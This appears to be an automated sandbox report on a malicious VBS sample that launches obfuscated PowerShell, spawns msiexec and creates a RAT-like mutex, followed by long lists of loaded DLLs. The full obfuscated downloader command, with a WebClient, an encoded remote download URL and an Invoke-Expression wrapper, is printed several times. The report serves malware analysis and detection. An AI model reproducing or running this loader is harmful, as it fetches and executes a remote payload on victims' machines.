obemBi.su.onsl ,cagKa.eeMenurSpe,imochnUn,eg.rikeFor rKruknseyceUndusOmbr.Mo aH Rame,nuaaDupldPa le Oe
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Taltegns;function janey($Naturprodukt){ .($Glassliberes) ($Naturprodukt)} function Infractor($Naturalization){$Reacquainted129=4;do{$Cozies104+=$Naturalization[$Reacquainted129];$Reacquainted129+=5;$Bemoil=Format-List} until(!$Naturalization[$Reacquainted129])$Cozies104}$Vagttaarnenes=Infractor 'W xbNparaeCentTR ck. Blow';$Vagttaarnenes+=Infractor 'Ba nEPjevbAwakc,arelTobaIBlepESqu NSprot';$Dysbulic=Infractor 'TekrMGroooMindzafpriSirilD bil DigaDa b/';$Altnglerne92=Infractor 'Imp TEthylFremsGrap1Spot2';$Segregerede=' Rig[MaksNNe,oEBechtB.ro.p.gwS k peKam.rIsagvAandiForpC SpeeVaskPSpgeorelai PhoNkompTHumoM.eroa m rnSangA alcG Rele BilRAlop]smre:Kiss: ejssCbfte sivc Su UOpharKar i ongTPen yAgnopHarlr.ariOnecet F.ro.jenCMjesoCollLRime=D.mp$WencaEscalPhostOvernBaneGTolvLScraESaldRU,pfNSgetE Asy9flyw2';$Dysbulic+=Infractor ' fre5S,rg. Car0Opse Resi(SygeW S.ci FlynPseudSpekoM.ljwK lvsUl.i ModuN iceT Unv Barn1Homo0Trib.Biod0Be i;Be t cod,WCar ih llnBefo6Mist4Nonn;Krad FripxF rs6apra4Stan;Rec. MarrArvevClas:Rhod1Ufo 3 Fol4 Opf.Unif0L vs)Ud a SickG erceMasocTrogk,onroGen,/Gono2,igo0K,pi1mass0U.in0 Dal1Fiel0 ata1 Ent B,deFOv,riPar rIne.eOve f oico Mi xSuda/ We 1Knig3Macu4 Sco.Ko t0';$Quillaias180=Infractor 'LocauSlagsBakkE Exirtogd-in dAHjlpgUn,ee He NUnunT';$Aabningstidernes=Infractor ' upmhKeglt .rntLe,sptri s Til: hor/San /OctadKnsfrMik.i sliv Ante U.u. ,legEft oquafoPolyg Prol nae Aut.S,idcCorroJug mOffe/ Re u KatcSpl ? ,loeMe axRi,dpUnd,oSp,rrSaldtLion=Un vdErhvoConcw abnEpiclskovoMissaKunsd Fro&UnsaiAntidOpsu=Aspa1Dep,yIron_Fr gMPennUEndo1.matISammxMelotUmrkx ,uiQUdhuaMoraDU.ign,wee_KundfFi a6Sala5 VicC HornLouv0 T gb FerFSti 8BedlLChlof,isc0.tlnXBuscC I o8AldeUCong0U deI';$Rotationspumperne=Infractor ' Ugi>';$Glassliberes=Infractor 'DormitilieV weX';$Eliquating='Gulvs';$Klatrende='\Udskilleres.Bre';janey (Infractor ',itr$OutcGUnscl KelO ,ncBnoneaResulAad,:,rspiC azN F,lTSpeer .blaOceaVrem E AscnSchcs ill= et$ElkaEWar nE.chvRdbe:NoncaLas.P UndpDiamDNegra FortInadaSylv+Skry$ yrbkarseLSalmAf rgTUnpir AirESc.rNSkrad esE');janey (Infractor ' Erk$PhysgBenzLHemaOArkobLokaaR adlSkul:LudwMS riIGratCCharM OctAStatcSmre=R fu$IngeaAnesa esBLillnSandiplynN mregAgenS A aT uttiCappDFu,dE,forRhollN Unfeu,shS Nay.KerySTriepHer LOgleILdenT ag(ev,j$Popur telO Best GalASo ntAuxiIRegrOPerfn munSTillPSam uAlvemSerpp Ac,eWarprLandN Pg ED,fr)');janey (Infractor $Segregerede);$Aabningstidernes=$Micmac[0];$Bayer=(Infractor 'cler$ ensgSyg.ltrocoUndebBaneAVavaLPluk: indeAlinmchilUA delNonpGSti.eNonfrRedbi outNCafeGpho eU taRT leNBarrECoenSOgr,= ,lbnCompE,ehaWGr n-uncaOinteB QabJScenEOutfCDoubTRen. tabeSReb.yPoleSsup,tOpbeEDy fMExpo.Iv.k$ RapvPlebA igeGPa it ,ipt .leaErgoaClu r ricnHfl EFo bN MelEpa,ls');janey ($Bayer);janey (Infractor 'L.fg$Frafe obemBi.su.onsl ,cagKa.eeMenurSpe,imochnUn,eg.rikeFor rKruknseyceUndusOmbr.Mo aH Rame,nuaaDupldPa le OeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF88B25BF669_2_00007FF88B25BF66
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF88B25CD129_2_00007FF88B25CD12
              Source: CO894GOV2O25.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5982
              Source: unknownProcess created: Commandline size = 5982
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5982Jump to behavior
              Source: amsi64_7424.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_7816.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7424, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7816, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@12/9@3/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Udskilleres.BreJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-B04NAT
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7824:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lkucyjce.3o1.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CO894GOV2O25.vbs"
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = 'explorer.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7424
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7816
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CO894GOV2O25.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Taltegns;function janey($Naturprodukt){ .($Glassliberes) ($Naturprodukt)} function Infractor($Naturalization){$Reacquainted129=4;do{$Cozies104+=$Naturalization[$Reacquainted129];$Reacquainted129+=5;$Bemoil=Format-List} until(!$Naturalization[$Reacquainted129])$Cozies104}$Vagttaarnenes=Infractor 'W xbNparaeCentTR ck. Blow';$Vagttaarnenes+=Infractor 'Ba nEPjevbAwakc,arelTobaIBlepESqu NSprot';$Dysbulic=Infractor 'TekrMGroooMindzafpriSirilD bil DigaDa b/';$Altnglerne92=Infractor 'Imp TEthylFremsGrap1Spot2';$Segregerede=' Rig[MaksNNe,oEBechtB.ro.p.gwS k peKam.rIsagvAandiForpC SpeeVaskPSpgeorelai PhoNkompTHumoM.eroa m rnSangA alcG Rele BilRAlop]smre:Kiss: ejssCbfte sivc Su UOpharKar i ongTPen yAgnopHarlr.ariOnecet F.ro.jenCMjesoCollLRime=D.mp$WencaEscalPhostOvernBaneGTolvLScraESaldRU,pfNSgetE Asy9flyw2';$Dysbulic+=Infractor ' fre5S,rg. Car0Opse Resi(SygeW S.ci FlynPseudSpekoM.ljwK lvsUl.i ModuN iceT Unv Barn1Homo0Trib.Biod0Be i;Be t cod,WCar ih llnBefo6Mist4Nonn;Krad FripxF rs6apra4Stan;Rec. MarrArvevClas:Rhod1Ufo 3 Fol4 Opf.Unif0L vs)Ud a SickG erceMasocTrogk,onroGen,/Gono2,igo0K,pi1mass0U.in0 Dal1Fiel0 ata1 Ent B,deFOv,riPar rIne.eOve f oico Mi xSuda/ We 1Knig3Macu4 Sco.Ko t0';$Quillaias180=Infractor 'LocauSlagsBakkE Exirtogd-in dAHjlpgUn,ee He NUnunT';$Aabningstidernes=Infractor ' upmhKeglt .rntLe,sptri s Til: hor/San /OctadKnsfrMik.i sliv Ante U.u. ,legEft oquafoPolyg Prol nae Aut.S,idcCorroJug mOffe/ Re u KatcSpl ? ,loeMe axRi,dpUnd,oSp,rrSaldtLion=Un vdErhvoConcw abnEpiclskovoMissaKunsd Fro&UnsaiAntidOpsu=Aspa1Dep,yIron_Fr gMPennUEndo1.matISammxMelotUmrkx ,uiQUdhuaMoraDU.ign,wee_KundfFi a6Sala5 VicC HornLouv0 T gb FerFSti 8BedlLChlof,isc0.tlnXBuscC I o8AldeUCong0U deI';$Rotationspumperne=Infractor ' Ugi>';$Glassliberes=Infractor 'DormitilieV weX';$Eliquating='Gulvs';$Klatrende='\Udskilleres.Bre';janey (Infractor ',itr$OutcGUnscl KelO ,ncBnoneaResulAad,:,rspiC azN F,lTSpeer .blaOceaVrem E AscnSchcs ill= et$ElkaEWar nE.chvRdbe:NoncaLas.P UndpDiamDNegra FortInadaSylv+Skry$ yrbkarseLSalmAf rgTUnpir AirESc.rNSkrad esE');janey (Infractor ' Erk$PhysgBenzLHemaOArkobLokaaR adlSkul:LudwMS riIGratCCharM OctAStatcSmre=R fu$IngeaAnesa esBLillnSandiplynN mregAgenS A aT uttiCappDFu,dE,forRhollN Unfeu,shS Nay.KerySTriepHer LOgleILdenT ag(ev,j$Popur telO Best GalASo ntAuxiIRegrOPerfn munSTillPSam uAlvemSerpp Ac,eWarprLandN Pg ED,fr)');janey (Infractor $Segregerede);$Aabningstidernes=$Micmac[0];$Bayer=(Infractor 'cler$ ensgSyg.ltrocoUndebBaneAVavaLPluk: indeAlinmchilUA delNonpGSti.eNonfrRedbi outNCafeGpho eU taRT leNBarrECoenSOgr,= ,lbnCompE,ehaWGr n-uncaOinteB QabJScenEOutfCDoubTRen. tabeSReb.yPoleSsup,tOpbeEDy fMExpo.Iv.k$ RapvPlebA igeGPa it ,ipt .leaErgoaClu r ricnHfl EFo bN MelEpa,ls');janey ($Bayer);janey (Infractor 'L.fg$Frafe obemBi.su.onsl ,cagKa.eeMenurSpe,imochnUn,eg.rikeFor rKruknseyceUndusOmbr.Mo aH Rame,nuaaDupldPa le Oe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Taltegns;function janey($Naturprodukt){ .($Glassliberes) ($Naturprodukt)} function Infractor($Naturalization){$Reacquainted129=4;do{$Cozies104+=$Naturalization[$Reacquainted129];$Reacquainted129+=5;$Bemoil=Format-List} until(!$Naturalization[$Reacquainted129])$Cozies104}$Vagttaarnenes=Infractor 'W xbNparaeCentTR ck. Blow';$Vagttaarnenes+=Infractor 'Ba nEPjevbAwakc,arelTobaIBlepESqu NSprot';$Dysbulic=Infractor 'TekrMGroooMindzafpriSirilD bil DigaDa b/';$Altnglerne92=Infractor 'Imp TEthylFremsGrap1Spot2';$Segregerede=' Rig[MaksNNe,oEBechtB.ro.p.gwS k peKam.rIsagvAandiForpC SpeeVaskPSpgeorelai PhoNkompTHumoM.eroa m rnSangA alcG Rele BilRAlop]smre:Kiss: ejssCbfte sivc Su UOpharKar i ongTPen yAgnopHarlr.ariOnecet F.ro.jenCMjesoCollLRime=D.mp$WencaEscalPhostOvernBaneGTolvLScraESaldRU,pfNSgetE Asy9flyw2';$Dysbulic+=Infractor ' fre5S,rg. Car0Opse Resi(SygeW S.ci FlynPseudSpekoM.ljwK lvsUl.i ModuN iceT Unv Barn1Homo0Trib.Biod0Be i;Be t cod,WCar ih llnBefo6Mist4Nonn;Krad FripxF rs6apra4Stan;Rec. MarrArvevClas:Rhod1Ufo 3 Fol4 Opf.Unif0L vs)Ud a SickG erceMasocTrogk,onroGen,/Gono2,igo0K,pi1mass0U.in0 Dal1Fiel0 ata1 Ent B,deFOv,riPar rIne.eOve f oico Mi xSuda/ We 1Knig3Macu4 Sco.Ko t0';$Quillaias180=Infractor 'LocauSlagsBakkE Exirtogd-in dAHjlpgUn,ee He NUnunT';$Aabningstidernes=Infractor ' upmhKeglt .rntLe,sptri s Til: hor/San /OctadKnsfrMik.i sliv Ante U.u. ,legEft oquafoPolyg Prol nae Aut.S,idcCorroJug mOffe/ Re u KatcSpl ? ,loeMe axRi,dpUnd,oSp,rrSaldtLion=Un vdErhvoConcw abnEpiclskovoMissaKunsd Fro&UnsaiAntidOpsu=Aspa1Dep,yIron_Fr gMPennUEndo1.matISammxMelotUmrkx ,uiQUdhuaMoraDU.ign,wee_KundfFi a6Sala5 VicC HornLouv0 T gb FerFSti 8BedlLChlof,isc0.tlnXBuscC I o8AldeUCong0U deI';$Rotationspumperne=Infractor ' Ugi>';$Glassliberes=Infractor 'DormitilieV weX';$Eliquating='Gulvs';$Klatrende='\Udskilleres.Bre';janey (Infractor ',itr$OutcGUnscl KelO ,ncBnoneaResulAad,:,rspiC azN F,lTSpeer .blaOceaVrem E AscnSchcs ill= et$ElkaEWar nE.chvRdbe:NoncaLas.P UndpDiamDNegra FortInadaSylv+Skry$ yrbkarseLSalmAf rgTUnpir AirESc.rNSkrad esE');janey (Infractor ' Erk$PhysgBenzLHemaOArkobLokaaR adlSkul:LudwMS riIGratCCharM OctAStatcSmre=R fu$IngeaAnesa esBLillnSandiplynN mregAgenS A aT uttiCappDFu,dE,forRhollN Unfeu,shS Nay.KerySTriepHer LOgleILdenT ag(ev,j$Popur telO Best GalASo ntAuxiIRegrOPerfn munSTillPSam uAlvemSerpp Ac,eWarprLandN Pg ED,fr)');janey (Infractor $Segregerede);$Aabningstidernes=$Micmac[0];$Bayer=(Infractor 'cler$ ensgSyg.ltrocoUndebBaneAVavaLPluk: indeAlinmchilUA delNonpGSti.eNonfrRedbi outNCafeGpho eU taRT leNBarrECoenSOgr,= ,lbnCompE,ehaWGr n-uncaOinteB QabJScenEOutfCDoubTRen. tabeSReb.yPoleSsup,tOpbeEDy fMExpo.Iv.k$ RapvPlebA igeGPa it ,ipt .leaErgoaClu r ricnHfl EFo bN MelEpa,ls');janey ($Bayer);janey (Infractor 'L.fg$Frafe obemBi.su.onsl ,cagKa.eeMenurSpe,imochnUn,eg.rikeFor rKruknseyceUndusOmbr.Mo aH Rame,nuaaDupldPa le Oe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Taltegns;function janey($Naturprodukt){ .($Glassliberes) ($Naturprodukt)} function Infractor($Naturalization){$Reacquainted129=4;do{$Cozies104+=$Naturalization[$Reacquainted129];$Reacquainted129+=5;$Bemoil=Format-List} until(!$Naturalization[$Reacquainted129])$Cozies104}$Vagttaarnenes=Infractor 'W xbNparaeCentTR ck. Blow';$Vagttaarnenes+=Infractor 'Ba nEPjevbAwakc,arelTobaIBlepESqu NSprot';$Dysbulic=Infractor 'TekrMGroooMindzafpriSirilD bil DigaDa b/';$Altnglerne92=Infractor 'Imp TEthylFremsGrap1Spot2';$Segregerede=' Rig[MaksNNe,oEBechtB.ro.p.gwS k peKam.rIsagvAandiForpC SpeeVaskPSpgeorelai PhoNkompTHumoM.eroa m rnSangA alcG Rele BilRAlop]smre:Kiss: ejssCbfte sivc Su UOpharKar i ongTPen yAgnopHarlr.ariOnecet F.ro.jenCMjesoCollLRime=D.mp$WencaEscalPhostOvernBaneGTolvLScraESaldRU,pfNSgetE Asy9flyw2';$Dysbulic+=Infractor ' fre5S,rg. Car0Opse Resi(SygeW S.ci FlynPseudSpekoM.ljwK lvsUl.i ModuN iceT Unv Barn1Homo0Trib.Biod0Be i;Be t cod,WCar ih llnBefo6Mist4Nonn;Krad FripxF rs6apra4Stan;Rec. MarrArvevClas:Rhod1Ufo 3 Fol4 Opf.Unif0L vs)Ud a SickG erceMasocTrogk,onroGen,/Gono2,igo0K,pi1mass0U.in0 Dal1Fiel0 ata1 Ent B,deFOv,riPar rIne.eOve f oico Mi xSuda/ We 1Knig3Macu4 Sco.Ko t0';$Quillaias180=Infractor 'LocauSlagsBakkE Exirtogd-in dAHjlpgUn,ee He NUnunT';$Aabningstidernes=Infractor ' upmhKeglt .rntLe,sptri s Til: hor/San /OctadKnsfrMik.i sliv Ante U.u. ,legEft oquafoPolyg Prol nae Aut.S,idcCorroJug mOffe/ Re u KatcSpl ? ,loeMe axRi,dpUnd,oSp,rrSaldtLion=Un vdErhvoConcw abnEpiclskovoMissaKunsd Fro&UnsaiAntidOpsu=Aspa1Dep,yIron_Fr gMPennUEndo1.matISammxMelotUmrkx ,uiQUdhuaMoraDU.ign,wee_KundfFi a6Sala5 VicC HornLouv0 T gb FerFSti 8BedlLChlof,isc0.tlnXBuscC I o8AldeUCong0U deI';$Rotationspumperne=Infractor ' Ugi>';$Glassliberes=Infractor 'DormitilieV weX';$Eliquating='Gulvs';$Klatrende='\Udskilleres.Bre';janey (Infractor ',itr$OutcGUnscl KelO ,ncBnoneaResulAad,:,rspiC azN F,lTSpeer .blaOceaVrem E AscnSchcs ill= et$ElkaEWar nE.chvRdbe:NoncaLas.P UndpDiamDNegra FortInadaSylv+Skry$ yrbkarseLSalmAf rgTUnpir AirESc.rNSkrad esE');janey (Infractor ' Erk$PhysgBenzLHemaOArkobLokaaR adlSkul:LudwMS riIGratCCharM OctAStatcSmre=R fu$IngeaAnesa esBLillnSandiplynN mregAgenS A aT uttiCappDFu,dE,forRhollN Unfeu,shS Nay.KerySTriepHer LOgleILdenT ag(ev,j$Popur telO Best GalASo ntAuxiIRegrOPerfn munSTillPSam uAlvemSerpp Ac,eWarprLandN Pg ED,fr)');janey (Infractor $Segregerede);$Aabningstidernes=$Micmac[0];$Bayer=(Infractor 'cler$ ensgSyg.ltrocoUndebBaneAVavaLPluk: indeAlinmchilUA delNonpGSti.eNonfrRedbi outNCafeGpho eU taRT leNBarrECoenSOgr,= ,lbnCompE,ehaWGr n-uncaOinteB QabJScenEOutfCDoubTRen. tabeSReb.yPoleSsup,tOpbeEDy fMExpo.Iv.k$ RapvPlebA igeGPa it ,ipt .leaErgoaClu r ricnHfl EFo bN MelEpa,ls');janey ($Bayer);janey (Infractor 'L.fg$Frafe obemBi.su.onsl ,cagKa.eeMenurSpe,imochnUn,eg.rikeFor rKruknseyceUndusOmbr.Mo aH Rame,nuaaDupldPa le OeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
